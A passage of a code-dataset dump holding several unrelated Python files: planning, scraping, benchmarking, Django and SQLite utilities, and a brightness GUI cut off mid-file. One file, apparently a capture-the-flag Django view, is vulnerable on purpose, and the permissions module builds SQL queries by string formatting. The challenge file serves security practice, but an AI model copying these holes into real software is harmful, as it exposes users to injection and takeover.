redirect(url_for('index'))\n","sub_path":"app/tickets.py","file_name":"tickets.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"100348514","text":"from machine.machine import load_machine\nfrom planning.planner import plan\nfrom planning.task import Task as PlanningTask\n\nfrom machine.state \\\n\timport State as MachineState, \\\n\t\t\tStateTolerance as MachineStateTolerance\n\t\t\t\nimport math\nimport os\n\n\n\n\n\n\n\nplanning_task = PlanningTask()\n\n\n# Создание объекта платформы\nscript_file_name = os.path.abspath(__file__)\ndirectory_name = os.path.dirname(script_file_name)\n\ntry:\n\tmachine_config_file = open(directory_name + \"/machine.conf\", \"r\")\n\tplanning_task.machine = load_machine(machine_config_file)\n\tmachine_config_file.close()\nexcept:\n\traise Exception() #!!!!! Генерировать хорошие исключения\n\t\n\t\nplanning_task.initial_machine_state = MachineState([0.0, 0.0, 0.0])\nplanning_task.target_machine_state = MachineState([0.0, 0.3, 0.0])\nplanning_task.target_machine_state_tolerance = \\\n\tMachineStateTolerance(\n\t\t[0.1, 0.1, 0.25 * math.pi]\n\t\t# [0.05, 0.05, 0.0625 * math.pi]\n\t)\n\t\n\t\nmachine_controls_sequence = plan(planning_task)\n\nif machine_controls_sequence is not None:\n\tfor machine_control in machine_controls_sequence:\n\t\tprint(\"%s %s %s\" % (machine_control.velocity, machine_control.angle, machine_control.duration))\nelse:\n\tprint(\"Нет пути\")\n\t","sub_path":"plan.py","file_name":"plan.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"431548726","text":"import unreal_engine as ue\r\nfrom time import sleep\r\nimport json\r\nfrom pathlib import Path\r\nimport time\r\n\r\nclass VTOL_BP:\r\n\tdef begin_play(self):\r\n\t\tFilePath = Path(__file__).parents[2]\r\n\t\ttimestr = time.strftime(\"%Y.%m.%d-%H.%M.%S\")\r\n\t\tFileName = \"LogFiles\\Log-\" + timestr + \".txt\"\r\n\t\tglobal FullFile\r\n\t\tFullFile = Path(FilePath, FileName)\r\n\t\t#print(FullFile)\r\n\t\t#global File \r\n\t\t#File = open(FullFile, \"w+\")\r\n\r\n\tdef SaveText(self, text):\r\n\t\tStringText = text.replace('\\\\n', '\\n')\r\n\t\t#StringText = str(text)\r\n\t\tFile = open(FullFile, \"a\")\r\n\t\tFile.write(StringText)\r\n\t\tFile.write('\\n')\r\n\t\tFile.close()\r\n","sub_path":"DroneScheduler/Content/Scripts/VTOLScript.py","file_name":"VTOLScript.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"61619153","text":"import json\nimport logging\nfrom decimal import Decimal\n\nfrom bs4 import BeautifulSoup\n\nfrom storescraper.categories import HEADPHONES, MONITOR, MOUSE\nfrom storescraper.product import Product\nfrom storescraper.store import Store\nfrom storescraper.utils import remove_words, session_with_proxy\n\n\nclass LapShop(Store):\n @classmethod\n def categories(cls):\n return [\n MONITOR,\n HEADPHONES,\n MOUSE,\n ]\n\n @classmethod\n def discover_urls_for_category(cls, category, extra_args=None):\n url_extensions = [\n ['monitores-gamer', MONITOR],\n ['monitores-business', MONITOR],\n ['audio', HEADPHONES],\n ['teclados-y-mouse', MOUSE],\n ]\n\n session = session_with_proxy(extra_args)\n product_urls = []\n for url_extension, local_category in url_extensions:\n if local_category != category:\n continue\n page = 1\n while True:\n if page > 10:\n raise Exception('page overflow')\n url_webpage = 'https://www.lapshop.cl/collections/{}?' \\\n 'page={}'.format(url_extension, page)\n print(url_webpage)\n data = session.get(url_webpage).text\n soup = BeautifulSoup(data, 'html.parser')\n product_container = soup.find('ul', 'productgrid--items')\n if not product_container:\n if page == 1:\n logging.warning('Empty category: ' + url_extension)\n break\n for container in product_container.findAll(\n 'a', 'productitem--image-link'):\n product_url = container['href']\n product_urls.append('https://www.lapshop.cl' + product_url)\n page += 1\n return product_urls\n\n @classmethod\n def products_for_url(cls, url, category=None, extra_args=None):\n print(url)\n session = session_with_proxy(extra_args)\n response = session.get(url)\n soup = BeautifulSoup(response.text, 'html.parser')\n json_info = json.loads(\n soup.find('script', {'data-section-type': 'static-product'}).text\n )['product']\n name = json_info['title']\n sku = str(json_info['id'])\n stock = -1 if json_info['available'] else 0\n normal_price = Decimal(json_info['price'] // 100)\n prices = soup.find('div', 'product-block--price')\n offer_price = Decimal(remove_words(\n prices.find('span', 'money').text))\n picture_urls = ['https:' + image_url.split('?')[0] for image_url in\n json_info['images']]\n\n if 'SEGUNDA' in name.upper():\n condition = 'https://schema.org/RefurbishedCondition'\n else:\n condition = 'https://schema.org/NewCondition'\n\n p = Product(\n name,\n cls.__name__,\n category,\n url,\n url,\n sku,\n stock,\n normal_price,\n offer_price,\n 'CLP',\n sku=sku,\n picture_urls=picture_urls,\n condition=condition\n )\n return [p]\n","sub_path":"storescraper/stores/lap_shop.py","file_name":"lap_shop.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"639044129","text":"# -*- coding: utf-8 -*-\nfrom django.conf import settings\nfrom django.test import TestCase\nfrom pigi1300.actions import get_signature\nfrom pigi1300.constants import SD\nfrom pigi1300.models import ClassifiedDocument, Copy, DestructionPV\n\n__author__ = 'Matthieu Gallet'\n\n\nclass TestDestructionPV(TestCase):\n def test_2d(self):\n doc_1 = ClassifiedDocument(record_number='record-1', classification=SD)\n doc_1.save()\n code_1d = '%s%05d%07d' % (Copy.PREFIX_1D, settings.EAN13_IDENTIFIER, 1)\n copy_1 = Copy(document=doc_1, copy_identifier=1, reproduction_identifier=None, self_issued=True,\n signature=get_signature(doc_1.record_number), code_1d=code_1d)\n copy_1.save()\n record_number = 'pv-1'\n obj_1 = DestructionPV(record_number=record_number, signature=get_signature(record_number), code_1d=code_1d)\n obj_1.save()\n obj_1.copies.add(copy_1)\n self.assertEqual(obj_1.to_2d(), 'pv-1:pv-1:1000010000001:record-1;SD;1;-')\n result = obj_1.to_2d()\n result += ':record-2;SD;2;-'\n obj_2 = DestructionPV.from_2d(result)\n self.assertEqual(obj_2.record_number, record_number)\n self.assertEqual(2, obj_2.copies.all().count())\n self.assertEqual(1, ClassifiedDocument.objects.filter(record_number='record-2', classification=SD).count())","sub_path":"pigi1300/tests/test_destructionpv.py","file_name":"test_destructionpv.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"575226877","text":"from django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render_to_response\nfrom django.views.decorators.csrf import csrf_exempt\nfrom forms import MessageForm\nfrom models import Messages\n\nimport md5\n\n\n@csrf_exempt\ndef message(request):\n if request.method == 'POST':\n form = MessageForm(request.POST)\n if form.is_valid():\n name = form.cleaned_data['name']\n content = form.cleaned_data['content']\n ip = request.META['REMOTE_ADDR']\n\n sess = request.session\n if not sess.has_key( 'name' ) or sess['name'] != name:\n sess['name'] = name\n\n if name.lower() == 'orange':\n name = 'Wrong way'\n content = 'Try to pwn a shell instead of cracking md5.'\n elif md5.new(name).hexdigest() == 'e5bc16fcbca0f279df17b66d8c37e109':\n name = 'Orange'\n\n Messages( name=name,\n content=content, \n ip=ip ).save()\n return HttpResponseRedirect( '/' )\n else:\n sess = request.session.load()\n if sess.has_key( 'name' ):\n default = sess['name']\n else:\n default = 'Guest'\n\n form = MessageForm( initial={'name': default} )\n\n messages = Messages.objects.order_by('id').reverse()[:100]\n response = render_to_response( 'message.html',\n {'form': form, 'messages': messages} )\n return response","sub_path":"vulnerableDjango/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"435561584","text":"import sqlite3\nimport os\n\ninitialized = False\nconn = None\nc = None\nc_dict = None\n\n\nGROUPS_DB = \"\"\"\n CREATE TABLE IF NOT EXISTS groups\n (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n name text UNIQUE\n );\n\"\"\"\n\nPERMISSIONS_DB = \"\"\"\n CREATE TABLE IF NOT EXISTS `permissions` (\n `id`\tINTEGER PRIMARY KEY AUTOINCREMENT,\n `action`\tTEXT,\n `name`\ttext,\n `notes`\tTEXT\n );\n\"\"\"\n\nGROUP_PERMISSIONS_DB = \"\"\"\n CREATE TABLE IF NOT EXISTS group_permissions\n (\n group_id integer NOT NULL,\n permission integer NOT NULL,\n FOREIGN KEY (group_id) REFERENCES groups(id),\n FOREIGN KEY (permission) REFERENCES permissions(id)\n );\n\"\"\"\n\n\ndef init(path=\"/\", database=\"permissions.db\"):\n global conn\n global c\n global initialized\n global c_dict\n\n conn = sqlite3.connect(os.path.join(path, database))\n c = conn.cursor()\n conn.row_factory = dict_factory\n c_dict = conn.cursor()\n\n c.execute(GROUPS_DB)\n c.execute(PERMISSIONS_DB)\n c.execute(GROUP_PERMISSIONS_DB)\n\n conn.commit()\n\n initialized = True\n\n\ndef can_group_access(group, action):\n init_check()\n group = get_group_id(group)\n action = get_permission_id(action)\n statement = \"SELECT COUNT(*) > 0 FROM group_permissions WHERE group_id='{}' AND permission='{}'\".format(group, action)\n c.execute(statement)\n val = c.fetchone()[0]\n return int(val) == 1\n\n\ndef grant_group_permission(group, action):\n init_check()\n group = get_group_id(group)\n action = get_permission_id(action)\n if can_group_access(group, action) is False:\n statement = \"INSERT INTO group_permissions VALUES ('{}', '{}')\".format(group, action)\n c.execute(statement)\n conn.commit()\n\n\ndef revoke_group_permission(group, action):\n init_check()\n group = get_group_id(group)\n action = get_permission_id(action)\n statement = \"DELETE FROM group_permissions WHERE group_id='{}' AND permission='{}'\".format(group, action)\n c.execute(statement)\n conn.commit()\n\n\ndef add_group(name):\n init_check()\n statement = \"INSERT INTO groups (name) VALUES ('{}')\".format(name)\n try:\n c.execute(statement)\n except sqlite3.IntegrityError:\n raise ValueError(\"The Group Which You Have Attempted To Create, Already Exists!\")\n conn.commit()\n return c.lastrowid\n\n\ndef add_permission(name):\n init_check()\n statement = \"INSERT INTO permissions (name) VALUES ('{}')\".format(name)\n c.execute(statement)\n conn.commit()\n\n\ndef get_permission_states(group):\n init_check()\n group = get_group_id(group)\n\n # HUGE query I made myself, and am very proud of :) - Go Me!\n statement = \"select *, id in (select id from group_permissions where permissions.id=group_permissions.permission and group_permissions.group_id='{}') as access from permissions\".format(group)\n c_dict.execute(statement)\n return c_dict.fetchall()\n\n\ndef get_group_info(group):\n init_check()\n group = get_group_id(group)\n statement = \"SELECT * FROM groups WHERE id='{}'\".format(group)\n c_dict.execute(statement)\n return c_dict.fetchone()\n\n\ndef revoke_all_permissions(group):\n statement = \"DELETE FROM group_permissions WHERE group_id='{}'\".format(group)\n c.execute(statement)\n conn.commit()\n\n\ndef get_all_groups():\n init_check()\n statement = \"SELECT * FROM groups\"\n c_dict.execute(statement)\n return c_dict.fetchall()\n\n\ndef get_group_name(group_id):\n statement = \"SELECT name FROM groups WHERE id='{}'\".format(group_id)\n c.execute(statement)\n return c.fetchone()[0]\n\n\n# region Dependencies\n# region Name To ID Converters\ndef get_group_id(name):\n init_check()\n if str(name).isdigit():\n return int(name)\n\n statement = \"SELECT id FROM groups WHERE name='{}'\".format(name)\n c.execute(statement)\n return c.fetchone()[0]\n\n\ndef get_permission_id(name):\n init_check()\n if str(name).isdigit():\n return int(name)\n statement = \"SELECT id FROM permissions WHERE name='{}'\".format(name)\n c.execute(statement)\n return c.fetchone()[0]\n# endregion\n\n\ndef init_check():\n if initialized is False:\n raise SystemError(\"Please Initialize Before Running (Call The 'init' Function)\")\n\n\ndef dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n# endregion\n\n","sub_path":"permissions/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":4382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"402206464","text":"import dbm\nimport json\nimport os\nimport os.path\nfrom collections import defaultdict\nfrom contextlib import redirect_stdout, suppress\nfrom random import randrange\n\nimport pysos\nfrom genutility.iter import batch\nfrom genutility.time import MeasureTime\nfrom pytablewriter import MarkdownTableWriter\nfrom sqlitedict import SqliteDict\n\nfrom lmdbm import Lmdb, __version__\nfrom lmdbm.lmdbm import remove_lmdbm\n\n\nclass JsonLmdb(Lmdb):\n\tdef _pre_value(self, value):\n\t\treturn json.dumps(value).encode(\"utf-8\")\n\tdef _post_value(self, value):\n\t\treturn json.loads(value.decode(\"utf-8\"))\n\ndef data(size):\n\tfor i in range(size):\n\t\tyield \"key_\" + str(i), {\"some\": \"object_\" + str(i)}\n\ndef randkeys(num, size):\n\tfor i in range(num):\n\t\tyield \"key_\" + str(randrange(0, size)) # nosec\n\ndef allkeys(num):\n\tfor i in range(num):\n\t\tyield \"key_\" + str(i)\n\ndef remove_dbm(path):\n\twith suppress(FileNotFoundError):\n\t\tos.unlink(path + \".dat\")\n\twith suppress(FileNotFoundError):\n\t\tos.unlink(path + \".bak\")\n\twith suppress(FileNotFoundError):\n\t\tos.unlink(path + \".dir\")\n\ndef run_bench(N, db_tpl):\n\n\tbatchsize = 1000\n\tLMDBM_FILE = db_tpl.format(\"lmdbm\")\n\tPYSOS_FILE = db_tpl.format(\"pysos\")\n\tSQLITEDICT_FILE = db_tpl.format(\"sqlitedict\")\n\tDBM_FILE = db_tpl.format(\"dbm\")\n\n\tremove_lmdbm(LMDBM_FILE)\n\twith suppress(FileNotFoundError):\n\t\tos.unlink(PYSOS_FILE)\n\twith suppress(FileNotFoundError):\n\t\tos.unlink(SQLITEDICT_FILE)\n\tremove_dbm(DBM_FILE)\n\tret = defaultdict(dict)\n\n\t# writes\n\n\t\"\"\" # without batch\n\twith PrintStatementTime(\"lmdbm (no batch) {} writes: {{delta:.02f}}\".format(N)):\n\t\tdb = JsonLmdb.open(LMDBM_FILE, \"c\")\n\t\tfor k, v in data(N):\n\t\t\tdb[k] = v\n\t\tdb.close()\n\n\tremove_lmdbm(LMDBM_FILE)\n\t\"\"\"\n\n\twith MeasureTime() as t:\n\t\twith JsonLmdb.open(LMDBM_FILE, \"c\") as db:\n\t\t\tfor pairs in batch(data(N), batchsize):\n\t\t\t\tdb.update(pairs)\n\tret[\"lmdbm\"][\"write\"] = t.get()\n\tprint(\"lmdbm batch write\", N, t.get())\n\n\twith open(os.devnull, \"w\") as devnull: # mute annoying \"free lines\" output\n\t\twith redirect_stdout(devnull):\n\t\t\twith MeasureTime() as t:\n\t\t\t\tdb = pysos.Dict(PYSOS_FILE)\n\t\t\t\tfor k, v in data(N):\n\t\t\t\t\tdb[k] = v\n\t\t\t\tdb.close()\n\tret[\"pysos\"][\"write\"] = t.get()\n\tprint(\"pysos write\", N, t.get())\n\n\twith MeasureTime() as t:\n\t\twith SqliteDict(SQLITEDICT_FILE) as db:\n\t\t\tfor pairs in batch(data(N), batchsize):\n\t\t\t\tdb.update(pairs)\n\t\t\t\tdb.commit()\n\tret[\"sqlitedict\"][\"write\"] = t.get()\n\tprint(\"sqlitedict batch write\", N, t.get())\n\n\twith MeasureTime() as t:\n\t\twith dbm.open(DBM_FILE, \"c\") as db:\n\t\t\tfor k, v in data(N):\n\t\t\t\tdb[k] = json.dumps(v)\n\tret[\"dbm\"][\"write\"] = t.get()\n\tprint(\"dbm write\", N, t.get())\n\n\t# reads\n\n\twith MeasureTime() as t:\n\t\twith JsonLmdb.open(LMDBM_FILE, \"r\") as db:\n\t\t\tfor k in allkeys(N):\n\t\t\t\tdb[k]\n\t#ret[\"lmdbm\"][\"read\"] = t.get()\n\tprint(\"lmdbm cont read\", N, t.get())\n\n\twith MeasureTime() as t:\n\t\twith JsonLmdb.open(LMDBM_FILE, \"r\") as db:\n\t\t\tfor k in randkeys(N, N):\n\t\t\t\tdb[k]\n\tret[\"lmdbm\"][\"read\"] = t.get()\n\tprint(\"lmdbm rand read\", N, t.get())\n\n\twith open(os.devnull, \"w\") as devnull: # mute annoying \"free lines\" output\n\t\twith redirect_stdout(devnull):\n\t\t\twith MeasureTime() as t:\n\t\t\t\tdb = pysos.Dict(PYSOS_FILE)\n\t\t\t\tfor k in randkeys(N, N):\n\t\t\t\t\tdb[k]\n\t\t\t\tdb.close()\n\tret[\"pysos\"][\"read\"] = t.get()\n\tprint(\"pysos read\", N, t.get())\n\n\twith MeasureTime() as t:\n\t\twith SqliteDict(SQLITEDICT_FILE) as db:\n\t\t\tfor k in randkeys(N, N):\n\t\t\t\tdb[k]\n\tret[\"sqlitedict\"][\"read\"] = t.get()\n\tprint(\"sqlitedict read\", N, t.get())\n\n\twith MeasureTime() as t:\n\t\twith dbm.open(DBM_FILE, \"r\") as db:\n\t\t\tfor k in randkeys(N, N):\n\t\t\t\tjson.loads(db[k])\n\tret[\"dbm\"][\"read\"] = t.get()\n\tprint(\"dbm read\", N, t.get())\n\n\treturn ret\n\ndef bench(base):\n\n\twith suppress(FileExistsError):\n\t\tos.mkdir(base)\n\n\tret = {}\n\tdb_tpl = os.path.join(base, \"test_{}.db\")\n\n\tfor num in [10, 100, 10**3, 10**4, 10**5, 10**6]:\n\t\tret[num] = run_bench(num, db_tpl)\n\n\treturn ret\n\ndef print_markdown_table(results, method):\n\n\tfor k, v in results.items():\n\t\theaders = list(v.keys())\n\t\tbreak\n\n\tvalue_matrix = []\n\tfor k, v in results.items():\n\t\trow = [k]\n\t\tfor h in headers:\n\t\t\trow.append(v[h][method])\n\t\tvalue_matrix.append(row)\n\n\theaders = [\"items\"] + headers\n\n\twriter = MarkdownTableWriter(table_name=method, headers=headers, value_matrix=value_matrix)\n\twriter.write_table()\n\nif __name__ == \"__main__\":\n\n\tfrom argparse import ArgumentParser\n\tparser = ArgumentParser()\n\tparser.add_argument(\"outpath\", default=\"bench-dbs\", help=\"Directory to store temporary benchmarking databases\")\n\tparser.add_argument(\"--version\", action=\"version\", version=__version__)\n\targs = parser.parse_args()\n\n\ta = bench(args.outpath)\n\tprint_markdown_table(a, \"write\")\n\tprint_markdown_table(a, \"read\")\n\tb = bench(args.outpath)\n\tprint_markdown_table(b, \"write\")\n\tprint_markdown_table(b, \"read\")\n","sub_path":"benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"345351665","text":"\"\"\"\nThis script creates a new database storing the information\nfound in the 5000 word_frequency list.\n\"\"\"\n\nimport sqlite3\nimport pandas as pd\nimport math\n\n######## Initialize Database ##########\n#file paths\nsqlite_file = 'word_freq_5000_db.sqlite' #name of database file\nword_data = '/home/andy/Projects/O/diff_anal/word_db/5000 word frequency list.csv'\n\n#Construct pandas dataframe \ndf = pd.read_csv(word_data, header=0)\ndf['Word'] = df['Word'].map( lambda x : str(x).strip('\\xc2\\xa0\\xc2\\xa0\\xc2\\xa0') ) #hack to eliminate unicode spaces (I wish I could find a more elegant solution)\ndf['Class'] = df['Rank'].map( lambda x : math.floor(x/100.0) ) #classifies vocabulary based on chunks of 100\n\n#Initialize SQL\nconn = sqlite3.connect(sqlite_file)\nc = conn.cursor()\n\n\n######### Create / Populate Database ###########\n#clear current database\nc.execute('''DROP TABLE WordFreq''')\n\n#initialize table \nc.execute(\n\t'''CREATE TABLE WordFreq (\n\t\t\tID INTEGER PRIMARY KEY, \n\t\t\tRank INTEGER, \n\t\t\tWord TEXT, \n\t\t\tPartofSpeech TEXT, \n\t\t\tFrequency INTEGER, \n\t\t\tDispersion REAL,\n\t\t\tClass INTEGER\n\t\t\t)''' \n\t)\n\n#populate table (convert dataframe to sql database)\ndf.to_sql(name='WordFreq', index=False, flavor='sqlite', con=conn, if_exists='replace')\n\n#commit changes\nconn.commit()\nconn.close()\n","sub_path":"init_word5000_db.py","file_name":"init_word5000_db.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"536227975","text":"#!/usr/bin/python3\nimport sys\nimport os\nimport subprocess\nfrom PySide import QtCore, QtGui\n#from PyQt4 import QtCore, QtGui\nclass Window(QtGui.QMainWindow): \n\tdef __init__(self):\n\t\tsuper(Window,self).__init__()\n\t\t#setting up the position of the GUI with 1st and 2nd parameters\n\t\t#(3rd and 4th parameters are not useful as we have fixed it's max and min size below)\n\t\tself.setGeometry(530,290,280,120)\n\t\tself.setWindowTitle(\"Brightness\")\n\t\t\n\t\tself.setMinimumSize(QtCore.QSize(280, 120))\n\t\tself.setMaximumSize(QtCore.QSize(280, 120))\n\t\t\n\t\t#The slider which we slide\n\t\tself.slide = QtGui.QSlider(self)\n\t\tself.slide.setGeometry(QtCore.QRect(70, 58, 160, 22))\n\t\tself.slide.setOrientation(QtCore.Qt.Horizontal)\n\t\tself.slide.valueChanged.connect(self.slided_def)\n\t\tself.slide.setMaximum(100)\n\t\tself.slide.setMinimum(0)\n\t\t\n\t\t#Just a label to denote what user need to do\n\t\tself.adj = QtGui.QLabel(self)\n\t\tself.adj.setGeometry(50, 5, 471, 20)\n\t\tself.adj.setText(\"Slide the bar to adjust brightness\")\n\t\t\n\t\t#creating and adding increment button\t\n\t\tself.inc = QtGui.QPushButton(\"+\",self)\n\t\tself.inc.setGeometry(QtCore.QRect(237, 60, 17, 17))\n\t\tself.inc.clicked.connect(self.inc_def)\n\n\t\t#creating and adding decrement button\t\n\t\tself.dec = QtGui.QPushButton(\"-\",self)\n\t\tself.dec.setGeometry(QtCore.QRect(45, 60, 17, 17))\n\t\tself.dec.clicked.connect(self.dec_def)\n\n\t\t#This label shows the black sun with rays! \n\t\tself.bright = QtGui.QLabel(self)\n\t\tself.bright.setGeometry(20, 60,20, 20)\n\t\tself.bright.setText(u\"\\u2600\")\n \t\n \t#This shows the percentage of brightness\n\t\tself.percentval = QtGui.QLabel(self)\n\t\tself.percentval.setGeometry(35, 35, 471, 20)\n\t\tself.percentval.setText(\"Slide the bar to adjust brightness\")\n\t\t\n\t\t#The set button\n\t\tself.set = QtGui.QPushButton(\"Set\",self)\n\t\tself.set.setGeometry(QtCore.QRect(20, 90, 120, 23))\n\t\tself.set.clicked.connect(self.set_val_def)\n\t\t\n\t\t#the exit button\n\t\tself.exit = QtGui.QPushButton(\"Exit\",self)\n\t\tself.exit.setGeometry(QtCore.QRect(144, 90, 120, 23))\n\t\tself.exit.clicked.connect(self.close_application)\n\t\t\n\t\t#we will use this one later for timer(our countdown is 10 but we use 9 because we waste a second on 10)\n\t\tself.count = 9\n\t\t\n\t\t#if such path exists then we change value in that path else exception propogates\n\t\ttry:\n\t\t\tpath = os.path.join(\"/sys/class/backlight/nv_backlight\", \"brightness\")\n\t\t\twith open(path, \"r\") as inputFile:\n\t\t\t\tself.init = inputFile.read()\n\t\t\t\tself.init1 = int(self.init)\n\t\texcept IOError:\n\t\t\ttry:\n\t\t\t\tpath = os.path.join(\"/sys/class/backlight/radeon_bl0\", \"brightness\")\n\t\t\t\twith open(path, \"r\") as inputFile:\n\t\t\t\t\tself.init1 = int(inputFile.read())/26\n\t\t\texcept IOError:\n\t\t\t\ttry:\n\t\t\t\t\tpath = os.path.join(\"/sys/class/backlight/intel_backlight\", \"brightness\")\n\t\t\t\t\twith open(path, \"r\") as inputFile:\n\t\t\t\t\t\tself.init1 = int(inputFile.read())/75\n\t\t\t\texcept IOError:\n\t\t\t\t\ttry:\n\t\t\t\t\t\ta = float(readx())*100\n\t\t\t\t\t\tself.init1 = int(a)\n\t\t\t\t\texcept IOError:\n\t\t\t\t\t\tchoice = QtGui.QMessageBox.warning(self,'Caution!',\"We are not supporting your display drivers as of now.\\nSorry:(\",QtGui.QMessageBox.Cancel)\n\t\t\t\t\t\tif choice == QtGui.QMessageBox.Cancel:\n\t\t\t\t\t\t\tsys.exit()\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tpass\n\n\t\tself.slide.setValue(int(self.init1))\n\t\t\n\t\t#uncomment the below 6 lines if you want :)\n\t\t#self.setGeometry(530,290,160,22)\n\t\t#self.setMinimumSize(QtCore.QSize(280, 150))\n\t\t#self.setMaximumSize(QtCore.QSize(280, 150))\n\t\t#self.india = QtGui.QLabel(self)\n\t\t#self.india.setGeometry(65 , 120, 471, 20)\n\t\t#self.india.setText(\" Made with \"+ u\"\\u2764\"+\" in INDIA\")\n\t\t\n\t\t\n\t\t#check if the user is running as root\n\t\tif not os.geteuid() == 0:\n\t\t\tchoice = QtGui.QMessageBox.warning(self,'Sorry',\"Only root can run this script!\\n\",QtGui.QMessageBox.Close)\n\t\t\tif choice == QtGui.QMessageBox.Close:\n\t\t\t\tsys.exit(1)\n\t\t\telse:\n\t\t\t\tpass\n\t\t\n\t\t\n\t\t\n\t\t#show all the above content in the dialog box\t\n\t\tself.show()\n\n\t\n\t#used with '+' to increment 1 unit\n\tdef inc_def(self):\n\t\ttmp1 = self.slide.value() \n\t\tself.slide.setValue(int(tmp1)+1)\n\t\n\t\n\t#used with '-' to decrement 1 unit\t\n\tdef dec_def(self):\n\t\ttmp1 = self.slide.value() \n\t\tself.slide.setValue(int(tmp1)-1) \n\n\n\t#just close the application\n\tdef close_application(self): \n\t\tsys.exit(1)\n\t\n\t\n\t#changimg value on slider on startup and on setting\t\n\tdef slided_def(self):\n\t\tval = self.slide.value()\n\t\tself.percentval.setText(str(val)+\" %\")\n\t\n\t\n\t#set the brightness\n\tdef set_val_def(self):\n\t\t#get the current values before setting the brightness\n\t\ttry:\n\t\t\tpath = os.path.join(\"/sys/class/backlight/nv_backlight\", \"brightness\")\n\t\t\twith open(path, \"r\") as inputFile:\n\t\t\t\tself.prev = inputFile.read()\n\t\texcept IOError:\n\t\t\ttry:\n\t\t\t\tpath = os.path.join(\"/sys/class/backlight/radeon_bl0\", \"brightness\")\n\t\t\t\twith open(path, \"r\") as inputFile:\n\t\t\t\t\tself.prev = int(inputFile.read())/26\n\t\t\texcept IOError:\n\t\t\t\ttry:\n\t\t\t\t\tpath = os.path.join(\"/sys/class/backlight/intel_backlight\", \"brightness\")\n\t\t\t\t\twith open(path, \"r\") as inputFile:\n\t\t\t\t\t\tself.prev = int(inputFile.read())/75\n\t\t\t\texcept IOError:\n\t\t\t\t\ttry:\n\t\t\t\t\t\ta = float(readx())*100\n\t\t\t\t\t\tself.prev = int(a)\n\t\t\t\t\texcept IOError:\n\t\t\t\t\t\tchoice = QtGui.QMessageBox.warning(self,'Caution!',\"We are not supporting your display drivers as of now.\\nSorry :(\",QtGui.QMessageBox.Cancel)\n\t\t\t\t\t\tif choice == QtGui.QMessageBox.Cancel:\n\t\t\t\t\t\t\tsys.exit()\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tpass\n \n\t\tval = self.slide.value()\n\t\t\n\t\t\n\t\t#if the setting value is less than 10% then we ask user if they are sure!\n\t\t#if they are sure,as a safety check we will wait for 10 seconds and revert back to previous brightness \n\t\tif val<10:\n\t\t\tchoice = QtGui.QMessageBox.warning(self,'Caution!',\"Are you sure you want to do this?\\nIt might not be visible to you!\",QtGui.QMessageBox.Yes| QtGui.QMessageBox.No)\n\t\t\tif choice == QtGui.QMessageBox.Yes:\n\t\t\t\tself.confirm()\n\t\t\t\tself.revert()\n\t\t\telse:\n\t\t\t\tpass\n\t\telse:\n\t\t\ttry:\n\t\t\t\ttext = str(val)\n\t\t\t\tpath = os.path.join(\"/sys/class/backlight/nv_backlight\", \"brightness\")\n\t\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\t\tinputFile.write(text)\n\t\t\t\t\tsave(\"/sys/class/backlight/nv_backlight\",text)\n\t\t\texcept IOError:\n\t\t\t\ttry:\n\t\t\t\t\ttext = str(val*26)\n\t\t\t\t\tpath = os.path.join(\"/sys/class/backlight/radeon_bl0\", \"brightness\")\n\t\t\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\t\t\tinputFile.write(text)\n\t\t\t\t\t\tsave(\"/sys/class/backlight/radeon_bl0\",text)\n\t\t\t\texcept IOError:\n\t\t\t\t\ttry:\n\t\t\t\t\t\ttext = str(val*75)\n\t\t\t\t\t\tpath = os.path.join(\"/sys/class/backlight/intel_backlight\", \"brightness\")\n\t\t\t\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\t\t\t\tinputFile.write(text)\n\t\t\t\t\t\t\tsave(\"/sys/class/backlight/intel_backlight\",text)\n\t\t\t\t\t\t\n\t\t\t\t\texcept IOError:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\ttext = int(val)\n\t\t\t\t\t\t\twritex(text)\n\t\t\t\t\t\texcept IOError:\n\t\t\t\t\t\t\tsys.exit(1)\n \n \n \t\n\t#we are creating a message box asking them to click 'Cancel' if they want to revert\n\tdef revert(self):\n\t\tself.startCount()\n\t\t#choice1 = QtGui.QMessageBox.warning(self,'Caution!',\"Reverting to previous brightness...\",QtGui.QMessageBox.Cancel)\n\t\tself.msg = QtGui.QMessageBox(self)\n\t\tself.msg.setText(\"Reverting in (10)\")\n\t\tself.msg.setInformativeText(\"Click cancel to stop reverting.\")\n\t\tself.msg.setWindowTitle(\"Reverting..\")\n\t\tself.msg.setIcon(QtGui.QMessageBox.Warning)\n\t\tself.msg.setStandardButtons(QtGui.QMessageBox.Cancel)\n\t\tself.msg.buttonClicked.connect(self.win_cancel) \t\n\t\tself.msg.open()\n\t\n\n\t#if the user clicks on cancel,this will be executed\n\tdef win_cancel(self):\n\t\tself.timer.stop() #stopping the timer\n\t\tself.msg.done(1) #closing the message box\n\t\tself.count = 9 #again setting up count for future use\n\n\n\t#starts the 